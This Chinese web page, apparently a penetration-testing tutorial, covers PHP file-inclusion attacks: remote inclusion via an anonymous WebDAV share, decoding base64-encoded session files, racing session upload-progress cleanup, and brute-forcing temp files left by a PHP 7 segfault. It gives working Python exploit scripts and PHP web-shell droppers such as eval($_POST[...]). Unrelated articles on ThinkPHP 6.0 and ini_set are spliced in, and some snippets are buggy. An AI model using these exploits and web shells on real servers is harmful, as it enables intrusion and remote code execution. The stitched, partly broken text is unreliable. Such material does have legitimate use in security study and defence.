当易受攻击的PHP应用程序代码尝试从攻击者控制的WebDAV服务器共享加载PHP Web shell时,WebDAV共享应该允许访问该文件。攻击者需要在其上配置具有匿名浏览访问权限的WebDAV服务器。因此,一旦易受攻击的应用程序尝试从WebDAV共享访问PHP Web shell,WebDAV服务器将不会要求任何凭据,易受攻击的应用程序将包含Web shell的PHP代码。
环境配置
同SMB环境配置一样,首先,重新配置PHP环境,在php.ini文件中禁用allow_url_fopen以及allow_url_include。然后,配置WebDAV服务器。
PHP环境设置
首先,在受害者主机上配置php.ini,将allow_url_fopen和allow_url_include设置为Off
然后重启服务查看phpinfo()配置是否生效
WebDAV服务器环境配置
需要使用匿名读取访问权限配置WebDAV服务器。
1、Ubuntu18.04手动搭建WebDAV服务器
(1)安装Apache Web服务器
sudo apt-get install -y apache2
(2)在Apache配置中启用WebDAV模块
sudo a2enmod davsudo a2enmod dav_fs
(3)创建WebDAV共享目录webdav和 php web shell
sudo mkdir -p /var/www/html/webdavsudo touch /var/www/html/webdav/shell.php
(4)将文件夹所有者更改为您的Apache用户,www-data以便Apache具有对该文件夹的写访问权
sudo chown -R www-data:www-data /var/www/
(5)编辑WebDAV配置文件
/etc/apache2/sites-available/000-default.conf
不需要启用身份验证
DavLockDB /var/www/html/DavLock<VirtualHost *:80># The ServerName directive sets the request scheme, hostname and port that # the server uses to identify itself. This is used when creating # redirection URLs. In the context of virtual hosts, the ServerName # specifies what hostname must appear in the request's Host: header to # match this virtual host. For the default virtual host (this file) this # value is not decisive as it is used as a last resort host regardless. # However, you must set it for any further virtual host explicitly. #ServerName www.example.com ServerAdmin webmaster@localhost DocumentRoot /var/www/html # Available loglevels: trace8, ..., trace1, debug, info, notice, warn, # error, crit, alert, emerg. # It is also possible to configure the loglevel for particular # modules, e.g. #LogLevel info ssl:warn ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined # For most configuration files from conf-available/, which are # enabled or disabled at a global level, it is possible to # include a line for only one particular virtual host. For example the # following line enables the CGI configuration for this host only # after it has been globally disabled with "a2disconf". #Include conf-available/serve-cgi-bin.conf Alias /webdav /var/www/html/webdav <Directory /var/www/html/webdav> DAV On </Directory></VirtualHost>
(6)重新启动Apache服务器,以使更改生效
sudo service apache2 restart
成功重新启动Apache服务器后,尝试访问WebDAV共享并确保WebDAV服务器不要求凭据。
除了上面在Ubuntu上一步步安装WebDAV服务器外,还可以利用做好的Docker镜像。
2、WebDAV Docker镜像
推荐使用Docker镜像方式去安装利用,免去一些因环境或配置不当而产生的问题
(1)拉取webdav镜像
镜像地址:https://hub.docker.com/r/bytemark/webdav
(2)用docker启动一个webdav服务器
docker run -v ~/webdav:/var/lib/dav -e ANONYMOUS_METHODS=GET,OPTIONS,PROPFIND -e LOCATION=/webdav -p 80:80 --rm --name webdav bytemark/webdav
(3)在~/webdav/data目录里面共享自己php脚本
(5)验证Webdav服务器
浏览器验证
终端验证
Getshell
在环境都配置完且验证之后,利用webdav目录~/webdav/data中共享的WebShell进行GetShell
类unc->payload
http://127.0.0.1/FI/index.php?file=//172.17.0.2//webdav/shell.php
shell.php
<?php echo eval(system("whoami"));phpinfo();?><?PHP fputs(fopen('poc.php','w'),'<?php @eval($_POST[Qftm])?>');?>
为什么这个不能直接加载一句话木马呢,因为使用PHP文件包含函数远程加载Webdav共享文件时,不能附加消息(GET/POST),但是我们可以自定义shell.php,通过服务器加载远程shell.php给我们自动生成一个Webshell。
请求构造的payload
从图中可以看到远程加载shell.php利用成功,可以根据状态码分析其加载过程:
其中code 207是由WebDAV(RFC 2518)扩展的状态码,代表之后的消息体将是一个XML消息,并且可能依照之前子请求数量的不同,包含一系列独立的响应代码。
蚁剑连接
连接远程加载shell.php生成的Webshell->poc.shell
WebDAV总结
webdav如今很多人都将其作为自己的个人数据共享存储服务器,其局限性远远小于SMB。
......未完待续
关联文章:
PHP文件包含漏洞利用思路与Bypass总结手册(一)
PHP文件包含漏洞利用思路与Bypass总结手册(二)
合天网安实验室相关实验推荐--文件包含漏洞
摘要:tp5.2直接更名为6,原因整个框架架构发生了变化 , 将框架, 做为一个组件集成到项目中, 全面拥抱组件化开发趋势, 与laravel完全一致了。目前官方的6.0手册还在编写中,还没有发布,待发布后php中文网第一时间更新!
以下为官方最新信息:
ThinkPHP5.2版本正式变更为6.0版本
主要考虑到新的架构调整变化较大以及不支持无缝升级这两大原因,官方正式宣布ThinkPHP5.2RC版本的版本号由原来的5.2变更为6.0(这一规划此前在核心成员中曾多次提及),不过PHP版本要求暂时没有变化(依然还是7.1+)。
最新6.0版本中,将会对Swoole及单元测试做出更多的完善支持。App应用架构体系也发生了较大的变化,从原来的单一App职责类拆分为一个App基础类和两个App类的运行时,包括Http类(满足包括WEB服务在内的Http服务)和Console类,并且可以更方便的在两个运行时之间相互调用。当然也可以更方便地扩展更多的App运行时。
只有Http运行时支持路由和多应用机制,在Console运行时中并没有多应用和路由的概念。
官方计划在今年的5月1日之前发布第二个RC版本,届时还将迎来新版的手册,并且大部分扩展也会基本升级完成。
那么问题来了,你是否希望5.1 LTS版本成为5.x版本的最后一个版本呢?欢迎大家留言讨论。
修改php.ini配置文件的几个函数先做一下介绍:
php中修改php配置文件(php.ini)的函数主要有四个函数:ini_get、ini_set、ini_get_all、ini_restore。其中ini_set和ini_get比较常用,下面分别做介绍。
(1)ini_get()
用来获取配置文件的选项值.
这个函数很多人都使过,其实就是获取配置文件中的某一个选项值,是true值返回1,是false值返回0,是字符串就返回的是字符串。
如果无法知道你的全局变量是否打开了,那么可以定制以下这样的函数:
function getGetVar($var)
{
if (ini_set('register_gobals')) {
return $var;
} else {
return $_GET['var'];
}
(2)ini_set函数
设置php.ini中的某些变量值.
这个函数是设置选项中的值,执行函数后就可以生效了,脚本结束的时候,这个设置也就跟着失效。不是全部的选项都能被改函数设置的,这个自己要明确。那么具体是那些值能设置,可以查看手册,手册可以在网上搜到。
就是能够设置php.ini中的选项值比如,display_error选项关闭了,但是你要显示程序中的错误信息,方便你调试程序,那么就可以使用这个函数:
ini_set("display_errors", "On");
那么在你这个页面的程序都会显示错误信息了,而且你还可以使用error_reporting来设置显示的错误信息级别。
如果你需要增加脚本执行时间,那么可以设置:
ini_set("max_execution_time", "180");
那么脚本执行时间就由默认的30秒变为180秒,当然,你也可以使用set_time_limit()来设置。
其实你把ini_set和ini_get结合使的话,非常好。比如你想在配置文件里添加自己的包含文件路径,但是你有没有权限更改php.ini,那么你可以结合两个函数:
ini_set('include_path',ini_get('include_path').':/your_include_dir:');
(3)ini_get_all
获取所有的设置选项变量
把所有选项值以数组的形式返回,方便你当phpinfo()无法使用的时候来使用。
1. 通过 php.ini 修改配置:
[root@/usr/local/php/etc]# /usr/local/php/bin/php -ini|grep php.ini Configuration File (php.ini) Path =>/usr/local/php-5.3.29/lib [root@/usr/local/php/etc]# vim /usr/local/php-5.3.29/lib/php.ini
2. 通过 ini_set 修改配置:
ini_set只能针对有效选项进行修改,
3. 通过 php-fpm.conf 修改配置:
通过 php_value/php_flag,php_admin_value/php_admin_flag 对php.ini配置进行修改;
该修改方法只会在php-fpm进程请求中生效;
二者的区别在于前者修改指令可以被ini_set覆盖,后者修改指令不能通过ini_set覆盖;
4. 自 5.3.3 起,通过 web服务器 修改配置:
如下通过nginx.conf修改配置:
set$php_value"pcre.backtrack_limit=424242";"$php_value \n pcre.recursion_limit=99999"fastcgi_param PHP_VALUE $php_valuefastcgi_param PHP_ADMIN_VALUE"open_basedir=/var/www/htdocs"
以上就是修改php.ini的几种方法,对刚刚接触PHP语言的同学们还是由于很大帮助的。
Bypass-Session限制
LFI-Base64Encode
很多时候服务器上存储的Session信息都是经过处理的(编码或加密),这个时候假如我们利用本地文件包含漏洞直接包含恶意session的时候是没有效果的。那么该怎么去绕过这个限制呢,一般做法是逆过程,既然他选择了编码或加密,我们就可以尝试着利用解码或解密的手段还原真实session,然后再去包含,这个时候就能够将恶意的session信息包含利用成功。
很多时候服务器上的session信息会由base64编码之后再进行存储,那么假如存在本地文件包含漏洞的时候该怎么去利用绕过呢?下面通过一个案例进行讲解与利用。
测试代码
session.php
常规利用
正常情况下我们会先传入恶意代码在服务器上存储恶意session文件
正常情况下我们会先传入恶意代码在服务器上存储恶意session文件
然后在利用文件包含漏洞去包含session
从包含结果可以看到我们包含的session被编码了,导致LFI -> session失败。
在不知道源代码的情况下,从编码上看可以判断是base64编码处理的
在这里可以用逆向思维想一下,他既然对我们传入的session进行了base64编码,那么我们是不是只要对其进行base64解码然后再包含不就可以了,这个时候php://filter就可以利用上了。
构造payload
index.php?file=php://filter/convert.base64-decode/resource=/var/lib/php/sessions/sess_qfg3alueqlubqu59l822krh5pl
意外的事情发生了,你发现解码后包含的内容竟然是乱码!!这是为什么呢??
bypass serialize_handler=php
对于上面利用php://filter的base64解码功能进行解码包含出现了错误,还是不能够利用成功,回过头仔细想想会发现,session存储的一部分信息是用户名base64编码后的信息,然而我们对session进行base64解码的是整个session信息,也就是说编码和解码的因果关系不对,也就导致解码的结果是乱码。
那有没有什么办法可以让base64编码和解码的因果关系对照上,答案是有的,先来了解一下base64编码与解码的原理。
Base64编码与解码Base64编码是使用64个可打印ASCII字符(A-Z、a-z、0-9、+、/)将任意字节序列数据编码成ASCII字符串,另有“=”符号用作后缀用途。
(1)base64编码过程
Base64将输入字符串按字节切分,取得每个字节对应的二进制值(若不足8比特则高位补0),然后将这些二进制数值串联起来,再按照6比特一组进行切分(因为2^6=64),最后一组若不足6比特则末尾补0。将每组二进制值转换成十进制,然后在上述表格中找到对应的符号并串联起来就是Base64编码结果。
由于二进制数据是按照8比特一组进行传输,因此Base64按照6比特一组切分的二进制数据必须是24比特的倍数(6和8的最小公倍数)。24比特就是3个字节,若原字节序列数据长度不是3的倍数时且剩下1个输入数据,则在编码结果后加2个=;若剩下2个输入数据,则在编码结果后加1个=。
完整的Base64定义可见RFC1421和RFC2045。因为Base64算法是将3个字节原数据编码为4个字节新数据,所以Base64编码后的数据比原始数据略长,为原来的4/3。
(2)简单编码流程
1)将所有字符转化为ASCII码;2)将ASCII码转化为8位二进制;3)将8位二进制3个归成一组(不足3个在后边补0)共24位,再拆分成4组,每组6位;4)将每组6位的二进制转为十进制;5)从Base64编码表获取十进制对应的Base64编码;
(3)base64解码过程
base64解码,即是base64编码的逆过程,如果理解了编码过程,解码过程也就容易理解。将base64编码数据根据编码表分别索引到编码值,然后每4个编码值一组组成一个24位的数据流,解码为3个字符。对于末尾位“=”的base64数据,最终取得的4字节数据,需要去掉“=”再进行转换。
(4)base64解码特点
base64编码中只包含64个可打印字符,而PHP在解码base64时,遇到不在其中的字符时,将会跳过这些字符,仅将合法字符组成一个新的字符串进行解码。下面编写一个简单的代码,测试一组数据看是否满足我们所说的情况。
测试代码探测base64_decode解码的特点
运行结果
从结果中可以看到一个字符串中,不管出现多少个特殊字符或者位置差异,都不会影响最终的结果,可以验证base64_decode是遇到不在其中的字符时,将会跳过这些字符,仅将合法字符组成一个新的字符串进行解码。
Bypass base64_encode了解了base64编码原理之后和解码的特点,怎么让base64解码和编码的因果关系对照上,其实就很简单了,我们只要让session文件中base64编码的前面这一部分username|s:40:"正常解码就可以,怎么才能正常解码呢,需要满足base64解码的原理,就是4个字节能够还原原始的3个字节信息,也就是说session前面的这部分数据长度需要满足4的整数倍,如果不满足的话,就会影响session后面真正的base64编码的信息,也就导致上面出现的乱码情况。
Bypass分析判断正常情况下base64解码包含serialize_handler=php处理过的原始session信息,未能正常解析执行
username|s:40:"PD9waHAgZXZhbCgkX1BPU1RbJ210ZnEnXSk7Pz4=";?file=php://filter/convert.base64-decode/resource=/var/lib/php/sessions/sess_qfg3alueqlubqu59l822krh5pl
依据base64编码和解码的特点进行分析,当session存储的信息中用户名编码后的长度为个位数时,username|s:1:"这部分数据长度为14,实际解码为usernames1,实际长度为10,不满足情况。
4组解码->缺少两个字节,后面需占两位(X 代表占位符)
username|s:1:" //原始未处理信息
user name s1XX //base64解码特点,去除特殊字符,填充两个字节'XX'
当session存储的信息中用户名编码后的长度为两位数时,username|s:11:"这部分数据长度为15,实际解码为usernames11,实际长度为11,不满足情况。
4组解码->缺少一个字节,后面需占一位
username|s:11:" //原始未处理信息
user name s11X //base64解码特点,去除特殊字符,填充一个字节'X'
当session存储的信息中用户名编码后的长度为三位数时,username|s:111:"
这部分数据长度为16,实际解码为usernames111,长度为12,满足情况。
4组解码->缺少零个字节,后面需占零位
username|s:11:" //原始未处理信息user name s111 //base64解码特点,去除特殊字符,填充0个字节'X'
这种情况下刚好满足,即使前面这部分数据正常解码后的结果是乱码,也不会影响后面恶意代码的正常解码。
构造可利用payload
构造payload传入恶意session
http://192.33.6.145/FI/session/session.phpPOST:username=qftmqftmqftmqftmqftmqftmqftmqftmqftmqftmqftmqftm<?php eval($_POST['mtfq']);?>
构造payload包含恶意session
http://192.33.6.145/FI/index.php?file=php://filter/convert.base64-decode/resource=/var/lib/php/sessions/sess_qfg3alueqlubqu59l822krh5plPOST:mtfq=phpinfo();
从相应结果中可以看到,在PHP默认的会话处理模式serialize_handler=php下,我们这次构造的payload成功解析了,达到了预期的目的。
bypass serialize_handler=php_serialize
在这里可能有人会想上面默认处理的是session.serialize_handler = php这种模式,那么针对session.serialize_handler = php_serialize这种处理方式呢,答案是一样的,只要能构造出相应的payload
满足恶意代码的正常解码就可以。
限制session包含的代码session.php
Bypass分析判断正常情况下base64解码包含serialize_handler=php_serialize处理过的原始session信息,未能正常解析执行
a:1:{s:8:"username";s:40:"PD9waHAgZXZhbCgkX1BPU1RbJ210ZnEnXSk7Pz4=";}?file=php://filter/convert.base64-decode/resource=/var/lib/php/sessions/sess_7qefqgu07pluu38m45isiesq3s
依据base64编码和解码的特点进行分析,当session存储的信息中用户名编码后的长度为个位数时,a:1:{s:8:"username";s:1:"这部分数据长度为25,实际解码为a1s8usernames1,实际长度为14,不满足情况。
4组解码->缺少两个字节,后面需占两位(X 代表占位符)
a:1:{s:8:"username";s:1:" //原始未处理信息
a1s8 user name s1XX //base64解码特点,去除特殊字符,填充两个字节'XX'
当session存储的信息中用户名编码后的长度为两位数时,a:1:{s:8:"username";s:11:"
这部分数据长度为26,实际解码为a1s8usernames11,实际长度为15,不满足情况。
4组解码->缺少一个字节,后面需占一位
a:1:{s:8:"username";s:11:" //原始未处理信息a1s8 user name s11X //base64解码特点,去除特殊字符,填充一个字节'X'
当session存储的信息中用户名编码后的长度为三位数时,a:1:{s:8:"username";s:11:"
这部分数据长度为27,实际解码为``a1s8usernames111`,长度为16,满足情况。
4组解码->缺少零个字节,后面需占零位
a:1:{s:8:"username";s:111:" //原始未处理信息
a1s8 user name s111 //base64解码特点,去除特殊字符,填充0个字节'X'
这种情况下刚好满足,即使前面这部分数据正常解码后的结果是乱码,也不会影响后面恶意代码的正常解码。
构造可利用payload
构造payload传入恶意session
http://192.33.6.145/FI/session/session.phpPOST:username=qftmqftmqftmqftmqftmqftmqftmqftmqftmqftmqftmqftm<?php eval($_POST['mtfq']);?>
构造payload包含恶意session
http://192.33.6.145/FI/session/index.php?file=php://filter/convert.base64-decode/resource=/var/lib/php/sessions/sess_7qefqgu07pluu38m45isiesq3s
POST:mtfq=phpinfo();
从相应结果中可以看到,这种模式下session.serialize_handler = php_serialize,我们构造的payload也成功的解析了,同样达到了预期的目的。
LFI-session_start()
一般情况下,session_start()作为会话的开始出现在用户登录等地方以维持会话,但是,如果一个站点存在LFI漏洞,却没有用户会话那么该怎么去包含session信息呢,这个时候我们就要想想系统内部本身有没有什么地方可以直接帮助我们产生session并且一部分数据是用户可控的,很意外的是这种情况存在,下面分析一下怎么去利用。
phpinfo session
想要具体了解session信息就要熟悉session在系统中有哪些配置。默认情况下,session.use_strict_mode值是0,此时用户是可以自己定义Session ID的。比如,我们在Cookie里设置PHPSESSID=Qftm,PHP将会在服务器上创建一个文件:/var/lib/php/sessions/sess_Qftm。
但这个技巧的实现要满足一个条件:服务器上需要已经初始化Session。在PHP中,通常初始化Session的操作是执行session_start()。所以我们在审计PHP代码的时候,会在一些公共文件或入口文件里看到上述代码。那么,如果一个网站没有执行这个初始化的操作,是不是就不能在服务器上创建文件了呢?很意外是可以的。下面看一下php.ini里面关键的几个配置项
session.auto_start:顾名思义,如果开启这个选项,则PHP在接收请求的时候会自动初始化Session,不再需要执行session_start()。但默认情况下,也是通常情况下,这个选项都是关闭的。
session.upload_progress.enabled = on:默认开启这个选项,表示upload_progress功能开始,PHP 能够在每一个文件上传时监测上传进度。这个信息对上传请求自身并没有什么帮助,但在文件上传时应用可以发送一个POST请求到终端(例如通过XHR)来检查这个状态。
session.upload_progress.cleanup = on:默认开启这个选项,表示当文件上传结束后,php将会立即清空对应session文件中的内容,这个选项非常重要。
session.upload_progress.prefix = "upload_progress_":
session.upload_progress.name = "PHP_SESSION_UPLOAD_PROGRESS":当一个上传在处理中,同时POST一个与INI中设置的session.upload_progress.name同名变量时(这部分数据用户可控),上传进度可以在SESSION中获得。当PHP检测到这种POST请求时,它会在SESSION中添加一组数据(系统自动初始化session), 索引是session.upload_progress.prefix与session.upload_progress.name连接在一起的值。
session.upload_progress.freq = "1%"+session.upload_progress.min_freq = "1":选项控制了上传进度信息应该多久被重新计算一次。通过合理设置这两个选项的值,这个功能的开销几乎可以忽略不计。
session.upload_progress:php>=5.4添加的。最初是PHP为上传进度条设计的一个功能,在上传文件较大的情况下,PHP将进行流式上传,并将进度信息放在Session中(包含用户可控的值),即使此时用户没有初始化Session,PHP也会自动初始化Session。而且,默认情况下session.upload_progress.enabled是为On的,也就是说这个特性默认开启。那么,如何利用这个特性呢?
查看官方给的案列
PHP_SESSION_UPLOAD_PROGRESS的官方手册
http://php.net/manual/zh/session.upload-progress.php
一个上传进度数组的结构的例子
<form action="upload.php" method="POST" enctype="multipart/form-data"><input type="hidden" name="<?php echo ini_get("session.upload_progress.name"); ?>" value="123" /> <input type="file" name="file1" /> <input type="file" name="file2" /> <input type="submit" /></form>
在session中存放的数据看上去是这样子的:
<?php$_SESSION["upload_progress_123"] = array("start_time" => 1234567890, // The request time "content_length" => 57343257, // POST content length "bytes_processed" => 453489, // Amount of bytes received and processed "done" => false, // true when the POST handler has finished, successfully or not "files" => array( 0 => array( "field_name" => "file1", // Name of the <input/> field // The following 3 elements equals those in $_FILES "name" => "foo.avi", "tmp_name" => "/tmp/phpxxxxxx", "error" => 0, "done" => true, // True when the POST handler has finished handling this file "start_time" => 1234567890, // When this file has started to be processed "bytes_processed" => 57343250, // Amount of bytes received and processed for this file ), // An other file, not finished uploading, in the same request 1 => array( "field_name" => "file2", "name" => "bar.avi", "tmp_name" => NULL, "error" => 0, "done" => false, "start_time" => 1234567899, "bytes_processed" => 54554, ), ));
Bypass思路分析
从官方的案例和结果可以看到session中一部分数据(session.upload_progress.name)是用户自己可以控制的。那么我们只要上传文件的时候,在Cookie中设置PHPSESSID=Qftm
(默认情况下session.use_strict_mode=0用户可以自定义Session ID),同时POST一个恶意的字段PHP_SESSION_UPLOAD_PROGRESS,(PHP_SESSION_UPLOAD_PROGRESS在session.upload_progress.name中定义),只要上传包里带上这个键,PHP就会自动启用Session,同时,我们在Cookie中设置了PHPSESSID=Qftm,所以Session文件将会自动创建。
事实上并不能完全的利用成功,因为session.upload_progress.cleanup = on
这个默认选项会有限制,当文件上传结束后,php将会立即清空对应session文件中的内容,这就导致我们在包含该session的时候相当于在包含一个空文件,没有包含我们传入的恶意代码。不过,我们只需要条件竞争,赶在文件被清除前利用即可。
Bypass思路梳理
(1)upload file
files={'file': ('a.txt', "xxxxxxx")}
(2)设置cookie PHPSESSID
session.use_strict_mode=0造成Session ID可控PHPSESSID=Qftm
(3)POST一个字段PHP_SESSION_UPLOAD_PROGRESS
session.upload_progress.name="PHP_SESSION_UPLOAD_PROGRESS",在session中可控,同时,触发系统初始化session
"PHP_SESSION_UPLOAD_PROGRESS":'<?php phpinfo();?>'
(4)session.upload_progress.cleanup = on
多线程,时间竞争
Bypass攻击利用
脚本利用攻击(1)编写Exp
import ioimport sysimport requestsimport threadingsessid = 'Qftm'def POST(session):while True: f = io.BytesIO(b'a' * 1024 * 50) session.post( 'http://192.33.6.145/index.php', data={"PHP_SESSION_UPLOAD_PROGRESS":"<?php phpinfo();fputs(fopen('shell.php','w'),'<?php @eval($_POST[mtfQ])?>');?>"}, files={"file":('q.txt', f)}, cookies={'PHPSESSID':sessid} )def READ(session): while True: response = session.get(f'http://192.33.6.145/index.php?file=../../../../../../../../var/lib/php/sessions/sess_{sessid}') # print('[+++]retry') # print(response.text) if 'flag' not in response.text: print('[+++]retry') else: print(response.text) sys.exit(0)with requests.session() as session: t1 = threading.Thread(target=POST, args=(session, )) t1.daemon = True t1.start() READ(session)
(2)攻击效果
服务器生成:sess_Qftm
恶意代码执行
Getshell
表单利用攻击这里可以更改官方给的案例进行利用upload.html
<!doctype html><html><body><form action="http://192.33.6.145/index.php" method="post" enctype="multipart/form-data"><input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" vaule="<?php phpinfo(); ?>" /> <input type="file" name="file1" /> <input type="file" name="file2" /> <input type="submit" /></form></body></html>
但是同样需要注意的是,cleanup是on,所以需要条件竞争,使用BP抓包,一遍疯狂发包,一遍疯狂请求。
(1)上传文件
(2)发包传入恶意会话
设置Cookie: PHPSESSID=123456789
(自定义sessionID),不断发包,生成session,传入恶意会话
请求载荷设置Null payloads
不断发包维持恶意session的存储
不断发包的情况下,在服务器上可以看到传入的恶意session
(3)发包请求恶意会话
不断发出请求包含恶意的session
请求载荷设置
Null payloads
在一端不断发包维持恶意session存储的时候,另一端不断发包请求包含恶意的session
从结果中可以看到,利用表单攻击的这种手法也是可以的,可以看到恶意代码包含执行成功。
Bypass-phpinfo()
LFI-php7 Segment Fault
利用条件
利用条件:7.0.0 <= PHP Version < 7.0.28
漏洞分析
在上面包含姿势中提到的包含临时文件,需要知道phpinfo同时还需条件竞争,但如果没有phpinfo的存在,我们就很难利用上述方法去getshell。
那么如果目标不存在phpinfo,应该如何处理呢?这里可以用php7 segment fault特性(CVE-2018-14884)进行Bypass。
php代码中使用php://filter的过滤器strip_tags , 可以让 php 执行的时候直接出现 Segment Fault , 这样 php 的垃圾回收机制就不会在继续执行 , 导致 POST 的文件会保存在系统的缓存目录下不会被清除而不想phpinfo那样上传的文件很快就会被删除,这样的情况下我们只需要知道其文件名就可以包含我们的恶意代码。
漏洞修复
PHP Version 7.0.28时已经修复该漏洞
攻击载荷
依据漏洞分析构造可利用的payload:
http://192.33.6.145/index.php?file=php://filter/string.strip_tags/resource=/etc/passwd
这种包含会导致php执行过程中出现segment fault,此时上传文件,临时文件会被保存在upload_tmp_dir所指定的目录下,不会被删除,这样就能达成getshell的目的。
代码环境
测试代码
漏洞利用
攻击载荷php segment fault
index.php?file=php://filter/string.strip_tags/resource=index.php
攻击利用-技巧1编写Exp
dir.php辅助查找生成的临时文件
Linux攻击环境
#python version 2.7import requestsfrom io import BytesIOimport refiles = {'file': BytesIO('<?php eval($_REQUEST[Qftm]);')}url1 = 'http://192.168.68.119/index.php?file=php://filter/string.strip_tags/resource=index.php'r = requests.post(url=url1, files=files, allow_redirects=False)url2 = 'http://192.168.68.119/dir.php?dir=/tmp/'r = requests.get(url2)data = re.search(r"php[a-zA-Z0-9]{1,}", r.content).group(0)print "++++++++++++++++++++++"print dataprint "++++++++++++++++++++++"url3='http://192.168.68.119/index.php?file=/tmp/'+datadata = {'Qftm':"system('whoami');"}r = requests.post(url=url3,data=data)print r.content
windows攻击环境
#python version 2.7import requestsfrom io import BytesIOimport refiles = {'file': BytesIO('<?php eval($_REQUEST[Qftm]);')}url1 = 'http://192.168.68.119/web/fi/index.php?file=php://filter/string.strip_tags/resource=index.php'r = requests.post(url=url1, files=files, allow_redirects=False)url2 = 'http://192.168.68.119/web/fi/dir.php?dir=C:/Windows/'r = requests.get(url2)data = re.search(r"php[a-zA-Z0-9]{1,}", r.content).group(0)print "++++++++++++++++++++++"print dataprint "++++++++++++++++++++++"url3='http://192.168.68.119/web/fi/index.php?file=C:/Windows/'+data+'.tmp'data = {'Qftm':"system('whoami');"}r = requests.post(url=url3,data=data)print r.content
运行脚本即可Getshell
然后查看服务器上恶意临时文件,确实存在未被删除!!
攻击利用-技巧2暴力破解
假如没有dir.php还能利用吗,答案是可以的,因为我们传入的恶意文件没有被删除,这样我们就可以爆破这个文件的文件名。
在上面的讲述中,我们知道不同的系统默认的临时文件存储路径和方式都不一样
Linux
Linux临时文件主要存储在/tmp/目录下,格式通常是(/tmp/php[6个随机字符])
windows
Windows临时文件主要存储在C:/Windows/目录下,格式通常是(C:/Windows/php[4个随机字符].tmp)
对比Linux和Windows来看,Windows需要破解的位数比Linux少,从而Windows会比Linux破解速度快,位数越长所需要耗费的时间就越大。
查看载荷攻击效果
#python version 2.7import requestsfrom io import BytesIOfiles = {'file': BytesIO('<?php eval($_REQUEST[Qftm]);')}url1 = 'http://192.168.68.119/web/fi/index.php?file=php://filter/string.strip_tags/resource=index.php'r = requests.post(url=url1, files=files, allow_redirects=False)########################暴力破解模块########################url2='http://192.168.68.119/web/fi/index.php?file=C:/Windows/php'+{fuzz}+'.tmp&Qftm=system('whoami');'data = fuzzprint "++++++++++++++++++++++"print dataprint "++++++++++++++++++++++"########################暴力破解模块########################
对于暴力破解模块,可以自己添加多线程模块进行暴力破解,也可以将暴力破解模块拿出来单独进行fuzz,推荐使用fuzz工具进行fuzz测试,fuzz工具一般都包含多线程、自定义字典等,使用起来很方便,不用花费时间去编写调试代码。
个人比较喜欢使用Fuzz大法,不管是目录扫描、后台扫描、Web漏洞模糊测试都是非常灵活的。
推荐几款好用的Fuzz工具
基于Go开发:gobuster https://github.com/OJ/gobuster基于Java开发:dirbuster OWASP杰出工具 kali自带基于Python开发:wfuzz https://github.com/xmendez/wfuzz
fuzz测试,配置参数,我这里使用的是Kali自带的 dirbuster进行模糊测试
参数设置好之后,开始进行测试
经过一段时间的破解,即可得到上传的临时文件的文件名,同时可以在响应包中看到后门文件的恶意代码也正常解析执行。
字典项目
分享一些文件包含、任意文件读取漏洞中常见的文件字典,使用字典结合burp可以方便的探索目标服务器上的敏感文件。
https://github.com/Team-Firebugs/Burp-LFI-testshttps://github.com/ev0A/ArbitraryFileReadListhttps://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion/Intruders
防御方案
文件权限的的管理尽量不使用动态包含对危险字符进行过滤配置open_basedir限制文件包含范围检查include类的文件包含函数中的参数是否外界可控设当设置allow_url_include=Off和allow_url_fopen=Off在发布应用程序之前测试所有已知的威胁关联文章:
PHP文件包含漏洞利用思路与Bypass总结手册(一)
PHP文件包含漏洞利用思路与Bypass总结手册(二)
PHP文件包含漏洞利用思路与Bypass总结手册(三)
渗透测试训练营
掌握渗透测试岗位9大核心知识体系,提升自身岗位竞争力
40+实战训练及考核,提升动手操作能力
胜任渗透测试工程师岗位功能能力